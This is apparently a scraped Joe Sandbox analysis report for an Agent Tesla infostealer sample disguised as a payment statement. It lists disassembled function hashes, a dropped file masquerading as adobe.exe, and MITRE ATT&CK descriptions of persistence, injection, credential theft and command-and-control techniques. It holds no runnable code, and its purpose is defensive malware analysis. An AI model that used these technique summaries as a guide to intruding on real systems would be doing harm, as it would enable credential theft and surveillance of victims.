Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a5e5ad773b24299b4e3d621679a8fa1ab58a9178e0b027e8da56f9330cb0a1d
Instruction ID: 0300a07d815104d278fb5430b983317769e151899aa09864b95dd2a2908612fa
Opcode Fuzzy Hash: 8a5e5ad773b24299b4e3d621679a8fa1ab58a9178e0b027e8da56f9330cb0a1d
Instruction Fuzzy Hash: 0301F935B101100FEBA0DABED55872A73D5E789708F109838E44ECB340DD21DC428780

Function 06E3A288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb077c67de0b4b90f7a91d0aa1b26d93c5bcde944d219f7c54716bbe77da255
Instruction ID: 6b7a00a1ae54dcafdeef191abda48200cd5a9b7b16d038b517ef4e47f7c8e0a6
Opcode Fuzzy Hash: bdb077c67de0b4b90f7a91d0aa1b26d93c5bcde944d219f7c54716bbe77da255
Instruction Fuzzy Hash: FA01A934B102241FEB60DA6ED55471A77D5E789718F109838E44ACB340DD26DC4187C1

Function 06E363E0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8883d8af0270b6d7da13efec86c9d2c810feb199c1523cdb0c601dfc8bfe321
Instruction ID: 927ef48ddcdbe367343c65825e73e15517c704a4a553ef94cd36ad33aee25e3f
Opcode Fuzzy Hash: c8883d8af0270b6d7da13efec86c9d2c810feb199c1523cdb0c601dfc8bfe321
Instruction Fuzzy Hash: E2E09AB1E14328BBCB90EAB4899E79E77ADEB42218F2194A5D444CB201E176CA02C391

Function 06E363EC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855b8f916cf71a7561db9cf985b91b5813bcbb63e041c98f4dffd035ac9af7e7
Instruction ID: f69bce9dffa6011bb5ae241d52b31cbe03bd71e0df16285a3cfc00b1dde28324
Opcode Fuzzy Hash: 855b8f916cf71a7561db9cf985b91b5813bcbb63e041c98f4dffd035ac9af7e7
Instruction Fuzzy Hash: D7E04F70E14268BBDF50DA74895D76A77ACEB42208F2094A4D405CB201E236CA02C741

Function 06E363F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction ID: e6683acf5053b49ee74d305e108de274e5bc97037a88574b16026f2c1070e94c
Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction Fuzzy Hash: F2E012B1E14328BBDF50DEB4C95D75EB7ADEB42218F2094B5D409DB201E676DE02C741

Non-executed Functions

Function 06E37618 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E3777D
$^q, xrefs: 06E37BA8
$^q, xrefs: 06E37BCA
$^q, xrefs: 06E37789
$^q, xrefs: 06E37BBE
$^q, xrefs: 06E3774C
$^q, xrefs: 06E37758
$^q, xrefs: 06E37BB4
$^q, xrefs: 06E37B09
$^q, xrefs: 06E37B15

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: d4c5c63c006a128a3bbb2bdbba4378563050b61bac5f60ebc952df0a2f15bd97
Instruction ID: 466afb0749ab614c7c23a7e99ccb28f256dcbf23d489396c1cbe61dbde9e590d
Opcode Fuzzy Hash: d4c5c63c006a128a3bbb2bdbba4378563050b61bac5f60ebc952df0a2f15bd97
Instruction Fuzzy Hash: D0123A74E003298FDF68DF65C958A9EB7B2FF88304F2095A9D409AB254DB30DD85CB85

Function 06E3A8A8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E3A9F9
$^q, xrefs: 06E3AA05
$^q, xrefs: 06E3AA5A
$^q, xrefs: 06E3AA66
$^q, xrefs: 06E3A9AA
$^q, xrefs: 06E3AA24
$^q, xrefs: 06E3AA30
$^q, xrefs: 06E3A99E

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 13d1e641b16648f0ff467fe11716e0a93766a311d6f270f9c1a993c7fa6cb01f
Instruction ID: 3f5601bcce924ead230979897c1edb48afdb503d5a8d8bcaeed51d9d9f844cd6
Opcode Fuzzy Hash: 13d1e641b16648f0ff467fe11716e0a93766a311d6f270f9c1a993c7fa6cb01f
Instruction Fuzzy Hash: 81918D34A003199FEB68DF69D548BAEB7F6FF88304F209439D441AB294DB759C85CB80

Function 06E37018 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E37520
.5vq, xrefs: 06E37073
$^q, xrefs: 06E37354
$^q, xrefs: 06E374B4
$^q, xrefs: 06E3752C
$^q, xrefs: 06E372FA
$^q, xrefs: 06E37360

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 3d8e845433336b03a324e2491fe8e703822a13f5136a944a9d199e8c217d9c41
Instruction ID: d6eb8b0888f85bf63c3bdf91abb6f6646b83ff31b75e8b9200988daec155b286
Opcode Fuzzy Hash: 3d8e845433336b03a324e2491fe8e703822a13f5136a944a9d199e8c217d9c41
Instruction Fuzzy Hash: 54F15A74A01318DFDB58DBA5C594A6EB7B3FF88300F208468D4159B3A8CB75EC82CB85

Function 06E38350 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E3860F
$^q, xrefs: 06E3861B
$^q, xrefs: 06E385AA
$^q, xrefs: 06E385B6

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 4e460c69058e5311ab32e09620d56def23a149e53137c3b711faacdac069771f
Instruction ID: 432c3b16517c81860aa953dee3d7be6f9394646c1d27f4124e173375a43712b9
Opcode Fuzzy Hash: 4e460c69058e5311ab32e09620d56def23a149e53137c3b711faacdac069771f
Instruction Fuzzy Hash: 55B14D34A103188FDB58DF69D59869EB7B2FF88304F249969E006DB395DB75DC82CB80

Function 06E38768 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E387F3
LR^q, xrefs: 06E388AA
LR^q, xrefs: 06E3885B
$^q, xrefs: 06E387E7

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: edb025f1a64a3ef40b6fafc8c4ef762ca45bdd83c3b5d5c398867dbf648bb6fb
Instruction ID: f30950ef846354d0b9a5caf86a5f060c7773d1b89d4522f284f98162bd21da96
Opcode Fuzzy Hash: edb025f1a64a3ef40b6fafc8c4ef762ca45bdd83c3b5d5c398867dbf648bb6fb
Instruction Fuzzy Hash: A451CF34B013119FEB58DB69C948A6FB7E6FF88304F1095A8E4469F3A5DA31EC44CB91

Function 06E3AC30 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E3ADE3
$^q, xrefs: 06E3ADB4
$^q, xrefs: 06E3AD61
$^q, xrefs: 06E3AE0C

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: e778607dca52180c1771341658c7a9e0ac00b1eb65c85354dcc1df5e51880ce0
Instruction ID: e8d086c126401d7b865bc0087324be6a23d56a17bf9e6aa607ec1f6c73cb5f2f
Opcode Fuzzy Hash: e778607dca52180c1771341658c7a9e0ac00b1eb65c85354dcc1df5e51880ce0
Instruction Fuzzy Hash: 8D518E34E103188FDF69DB69D5886ADB3B2FB88309F249939D8469B354DB31DC81CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Adobe\adobe.exe

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Function 04B9990C Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 04B99918 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0098B0E8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 0098590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 04B91264 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 00984248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 04B99674 Relevance: 1.6, APIs: 1, Instructions: 82
injectionCOMMON

Function 04B99690 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 04B99778 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0098AFD4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0098D5C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre